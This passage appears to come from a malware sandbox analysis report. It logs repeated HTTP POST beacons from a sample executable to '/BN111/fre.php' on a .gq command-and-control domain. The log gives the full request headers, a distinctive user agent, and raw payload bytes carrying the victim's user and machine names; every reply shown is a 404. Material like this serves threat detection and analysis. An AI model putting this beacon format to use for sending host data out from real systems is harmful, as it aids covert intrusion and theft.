                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=rzu%2FohVuhjczWDe7tSOrF0uRiMZdPJrfjpN1hISShviTn6CxquhhvYU2ZYQ2Afh3g6P1FuSAKzKR6pmpqQCL727H0cqqtCgKFYjeXiZlAHmuAv%2B5N6h1XDjgPB5X%2FZuAlzCAkAnMt54YuBWaZYpOMDRgoMijug%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0bb69254339-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      45192.168.2.649871104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:23.419826031 CEST3440OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:23.435642004 CEST3513OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:23.542494059 CEST3948INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PIDL4Ex4yVSKIruz6ska5ciNfQXYfiK08MG3n%2Fl5sBh3uTbHelpQ%2BjFtXJazHaCXD%2FcS9T%2FNICexg23jtCzdGJnXlzeuuDLWonv2ZPeq4lMjDt5h2txZPLlLYA9u9inYXLCUr1h1CBSjz2d%2B08xCKW78cQE3ng%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0c56e57d6d1-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      46192.168.2.649872172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:27.468224049 CEST7347OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:27.484252930 CEST7347OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:27.586599112 CEST7348INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7ltrm6sBYZ30PkF8Z7VQJ7TUsrGZvzAnFrCkFXlgpwUKIwSLl0AKErABPq3oLlrSThb2YL8K3CEZTNit0GLpNLsiF78D%2Bo%2FeB6vJTTi3fwh0lA8bdxzosx88%2BepGYJVN9NOxQjuwGMKesX%2FSg1REiYGp8lFNnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0debb1b68f7-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      47192.168.2.649873104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:29.646629095 CEST7349OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:29.666580915 CEST7349OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:29.765604973 CEST7350INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tR8YTHsFUlHBp8jLYHNxWg6PfHZ0Q9qY6Z3f00iw%2FRPkfDCJWPs2NCsHs%2BJRNc7qtmk0cQf9cr5pQNsUFXF%2BJcUJy6DqBggagu08v%2BAxRuxiMb5hoOAO2BqKdlUHQOZJ0B4Pm%2FOMKal28DTap0fJzQTMHSpwyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0ec5bd44401-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      48192.168.2.649875172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:31.734477043 CEST7352OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:31.750525951 CEST7352OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:31.847372055 CEST7353INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:31 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L2EsWzEZJKWTDEn93sKWFLzev8Sl0yir0x01b%2BkSL3ujzOb1%2BV3ppWcxuzQdjug6QJKPfPBqA70PVP6l0gcrvl1Nke8DdVo%2BNZdDAhag%2BRgxa5KekRs3f6n4KUeQs4FC1ErSaLb8kvrBEaD%2FKEum9jCbi9W6LA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec0f9584568fe-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Oct 14, 2021 08:29:31.847683907 CEST7353INData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      49192.168.2.649876172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:33.006582975 CEST7811OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:33.022634983 CEST7811OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:33.126630068 CEST7812INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:33 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Wa5i4pYc47XTZTSRKuePuJGDKfzroVXSpP4vHBUDcpsntok8NHAncV7jpTLBPs6CkrH8kUIW9ytBz2JwxWNyMqJw1jmWzD%2Fy1Bnna2df9JCgcS%2Fw7JdgzCjsdEOd%2BbuV0ccxxBXnyytwG6K3l%2FcIIvtKwmy4fQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1015b90702b-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      5192.168.2.649784172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:28:24.885116100 CEST1064OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:28:24.901196003 CEST1064OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:28:25.039886951 CEST1065INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:28:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TUPKE8D4UGkHYeoSd0yWKGHpiVyKRj77CORXDe0%2F1O83cFqfjhqZ0VrDKDJl5PNFM1d7k7a%2BakFbs2fwMXUXRPnpAD93uQfrQNlF5%2B5FUNRmWTFz4Fi75GfzaL9mPeByBQ%2BOUK4b0qNxYwgtN4fwhqW64C7hPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69debf578ab14e5c-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      50192.168.2.649878104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:35.265240908 CEST7813OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:35.281400919 CEST7813OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:35.384254932 CEST7814INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=68hgMnUBuHCsDUjLDFpqWCCQ2g0nALTKRqB%2BkiRtXAxjxPALNlT80KDT0GEMZAtpHUyMeDuNH4MC3L2MUas1uw3Tkjx5nm6dtpUi4kAfnIyf5i1cJw47x%2BYEBToHMbM6J5K1gQPhnXfkSWBbeb76%2Bs%2F4PqZQXA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec10f6862646d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      51192.168.2.649883104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:36.968308926 CEST7820OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:36.985647917 CEST7820OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:37.123816013 CEST7823INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YUMi%2BKCQiebAYfk%2BBHidFFMjdX1L%2B1Iti6n0n9f53wMYFdVumBnToBBg78Fzogxr7V3VykOGcApOxm9l1ZNdwS3q1NBnlV56c4eet1gWdXUfPWzTFfWnX4HH4BnbmoIGtizbJCTdvwv6CXf3B0vdLyoWMpNG7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec11a19e04a7f-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      52192.168.2.649890104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:38.139185905 CEST7840OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:38.155143023 CEST7842OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:38.253525972 CEST7844INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R6o5MMg7SbvUqktXOhLjA1Fnbswl29jahtPLPtZB%2F4x11eIb1xozO%2BsAnzF9weZv0qW6u4hDKdl%2FulXZxPK440HB6R9%2BHt10S57wJou4G%2B1ynyQn8M318af4%2FOta46SlgLFPdMQ9Fk1N%2Bbz9IjlO9LnEHUhfxw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1216ed06927-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      53192.168.2.649897104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:39.373198032 CEST7857OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:39.391185999 CEST7858OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:39.677830935 CEST7861INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hGTok4Pwn41ZRv1MumUHtTCRvKskuQeV7Tzz2LKP7TXQ%2BjHQX%2Bdc7hCUk0B93YW6i4W3l25Za7zFA9%2BUgikpTke7QSUXWzExiifQ89U8wsISzKRfHFHuLqm%2BOsRCRCWUlSjMQHz33ABcV%2F%2BHbvOmCP2te4WgCQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1291bfb6943-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      54192.168.2.649905172.67.219.10480C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:40.707680941 CEST7874OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:40.724066019 CEST7874OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:40.835604906 CEST7876INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1W6FUoErQkVxlBPw7%2BXATW83hqhBSlVS6%2FhzlhKejgcPspDjQWYsm3X5UX3pJCE9Ts7B%2BzefPUHY%2BB%2BB8iI5yQqS8bnXyeWA6pA0FPv3X6QGWOzitWjJfeequ1dvbp%2FoQG57ZdzOBYGjNXOLdmI%2FpOQ67mjazg%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec1317c562c32-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Oct 14, 2021 08:29:40.835632086 CEST7876INData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      55192.168.2.649910104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:41.873661041 CEST7887OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:41.889930010 CEST7887OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:41.995091915 CEST7889INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GO6eCdCM4%2F6hA7dtd%2FoaiUrVjzpTaEYd0xVhp5YRWC%2BcFYd%2B827KZzyPcBHQZIMwEPE1lsx4Y%2FXrxohcjCmA2j%2FkkXNqUbdwkLVmbF7cdjV7n1NxRpQeMBRyy%2FLA0LTuL7Nvjpyb%2Buz9nG1ScVdle1E27JKKHw%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec138b9821456-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                      Data Ascii: File not found.


                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      56192.168.2.649911104.21.62.3280C:\Users\user\Desktop\aZOmps0Ug8.exe
                      TimestampkBytes transferredDirectionData
                      Oct 14, 2021 08:29:43.281959057 CEST7889OUTPOST /BN111/fre.php HTTP/1.0
                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                      Host: 74f26d34ffff049368a6cff8812f86ee.gq
                      Accept: */*
                      Content-Type: application/octet-stream
                      Content-Encoding: binary
                      Content-Key: F4173EBC
                      Content-Length: 169
                      Connection: close
                      Oct 14, 2021 08:29:43.298171997 CEST7890OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 10 00 00 00 65 00 6e 00 67 00 69 00 6e 00 65 00 65 00 72 00 01 00 0c 00 00 00 33 00 37 00 37 00 31 00 34 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31
                      Data Ascii: (ckav.ruengineer377142DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                      Oct 14, 2021 08:29:43.452020884 CEST7891INHTTP/1.1 404 Not Found
                      Date: Thu, 14 Oct 2021 06:29:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Connection: close
                      vary: Accept-Encoding
                      CF-Cache-Status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CxsCHuzow%2F33c%2FCkji95GCcFRRddEjpXSTQlsgwfn1tNfjUG93xxIl1QFhyVjuOCfzG3xO4Dx0oqdciEFdAMIjFtDzSwsy%2BZAnBFJ%2BUIcvKJcPAL57TCTabS1rK7mISZlPofKYNa1NQhc21szCDAJAXGAw7LbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 69dec14189124e0d-FRA
                      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
